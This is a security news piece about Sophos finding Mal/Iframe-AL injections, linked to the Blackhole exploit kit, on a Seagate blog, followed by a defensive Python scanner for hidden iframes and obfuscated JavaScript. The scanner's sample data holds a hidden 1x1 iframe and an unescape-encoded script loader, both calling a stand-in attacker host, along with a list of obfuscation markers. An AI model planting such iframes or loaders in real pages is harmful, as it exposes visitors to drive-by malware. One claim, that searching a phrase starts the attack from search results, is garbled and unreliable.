Antivirus watchdog Sophos is reporting rogue Apache modules being distributed on several compromised mainstream websites, including a Seagate blog. Sophos Labs reported that it has been tracking an infection of the Mal/Iframe-AL injection framework on the Seagate site for several months. Mal/Iframe-AL is a generic detection for malicious redirects from legitimate websites to sites that host an exploit kit known as "Blackhole." Per this story: Seagate was informed of the breach back in February, but so far the company has failed to remove the malicious iframe detected by Sophos as Mal/Iframe-AL.
This unwanted detection of a malware iframe can generally be observed on two types of files: raw JavaScript with malicious code prepended to it, and HTML web pages. A malicious iframe (an inline frame on the web page) can be overlaid on the legitimate content of the page. A malware programmer can make the inline frame as small as one pixel square, making it invisible to the user but still allowing malicious content to be delivered to your computer without visibly transporting the user to the malicious source of the code. If a website doesn't check search terms adequately for obfuscated JavaScript, the iframe data is stored and passed on. When someone then searches for "malware IFrame" and clicks a result, the attack is initiated directly from the search result, because the browser can read the obfuscated JavaScript even if you can't. See the Guardian.uk story "What's an I-Frame Attack, and why should I care?" for more information.
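As an added example (not code from the article or from Sophos), the following Python script applies the two observations above as detection heuristics a site owner could run over their own pages and script files: it flags iframes that are tiny (1x1 pixel or smaller) or hidden by CSS and point at a third-party host, and it flags JavaScript files whose first couple of kilobytes carry common obfuscation markers such as `unescape(` or long runs of hex escapes. The sample HTML, the sample JS, the `SITE_HOST` value and the `attacker-placeholder.example` host are constructed for the demonstration and are assumptions, not values from the Sophos report.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: normal blog markup, one benign embedded video iframe,
# and one injected 1x1 hidden iframe of the kind the article describes.
SAMPLE_HTML = """<html><body>
<h1>Blog post (constructed example)</h1>
<p>Normal content.</p>
<iframe src="https://www.youtube.com/embed/abc123" width="560" height="315"></iframe>
<iframe src="http://attacker-placeholder.example/in.php" width="1" height="1"
        style="visibility:hidden;position:absolute"></iframe>
</body></html>"""

# Constructed JS samples: one with obfuscated code prepended, one clean.
SAMPLE_JS_INJECTED = (
    "document.write(unescape('%3Cscript%20src%3D%22http%3A%2F%2Fattacker-placeholder.example%2Fx.js%22%3E%3C%2Fscript%3E'));\n"
    "function legitimateCode() { return 1; }\n"
)
SAMPLE_JS_CLEAN = "function legitimateCode() { return 1; }\n"

SITE_HOST = "blog.example.com"  # assumed hostname of the site being scanned

OBFUSCATION_MARKERS = ("eval(", "unescape(", "String.fromCharCode(", "document.write(unescape")


def _px(value):
    """Parse a width/height attribute such as '1', '1px' or '560'; None if unparsable."""
    if value is None:
        return None
    m = re.match(r"\s*(\d+)", value)
    return int(m.group(1)) if m else None


class IframeCollector(HTMLParser):
    """Collect every <iframe> start tag and its attributes (stdlib parser, works offline)."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append(dict(attrs))


def iframe_findings(html, site_host):
    """Return [(src, reasons)] for iframes that look like injected hidden frames.

    A frame is reported only when it is concealed (tiny or hidden via CSS); a
    third-party src on its own is recorded as a reason but is not enough by itself,
    so ordinary embedded videos are not flagged.
    """
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        reasons = []
        src = attrs.get("src") or ""
        w, h = _px(attrs.get("width")), _px(attrs.get("height"))
        if w is not None and h is not None and w <= 1 and h <= 1:
            reasons.append("tiny frame (<=1x1 px)")
        style = (attrs.get("style") or "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden via CSS")
        host = urlparse(src).hostname or ""
        if host and host != site_host:
            reasons.append("third-party src " + host)
        if any(r.startswith(("tiny", "hidden")) for r in reasons):
            findings.append((src, reasons))
    return findings


def prepended_obfuscated_js(js_text, head_chars=2000):
    """Heuristic for JS files with obfuscated code prepended: inspect only the head.

    Fires on two or more obfuscation markers, or on a dense run of hex/percent escapes.
    """
    head = js_text[:head_chars]
    marker_hits = sum(1 for marker in OBFUSCATION_MARKERS if marker in head)
    escapes = len(re.findall(r"\\x[0-9a-fA-F]{2}|%[0-9a-fA-F]{2}", head))
    return marker_hits >= 2 or escapes >= 40


if __name__ == "__main__":
    for src, reasons in iframe_findings(SAMPLE_HTML, SITE_HOST):
        print("suspicious iframe:", src, "->", ", ".join(reasons))
    print("injected JS flagged:", prepended_obfuscated_js(SAMPLE_JS_INJECTED))
    print("clean JS flagged:", prepended_obfuscated_js(SAMPLE_JS_CLEAN))
```

Heuristics like these produce false positives (tracking pixels, legitimately hidden frames), so treat a hit as something to diff against the deployed source rather than as proof of compromise; a server-side check of the Apache module list and file integrity is the complementary step, since the article attributes the injection to rogue modules rather than to edited page files.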
The Mal/Iframe-AL code located on the Seagate blog and reported by Sophos on March 15, 2013, is blocked by Sophos EndUser Protection. To guard against rogue code being downloaded to your computer, make sure your OS has all current security patches installed and that your antivirus / anti-malware clients are updated with the latest detection patterns.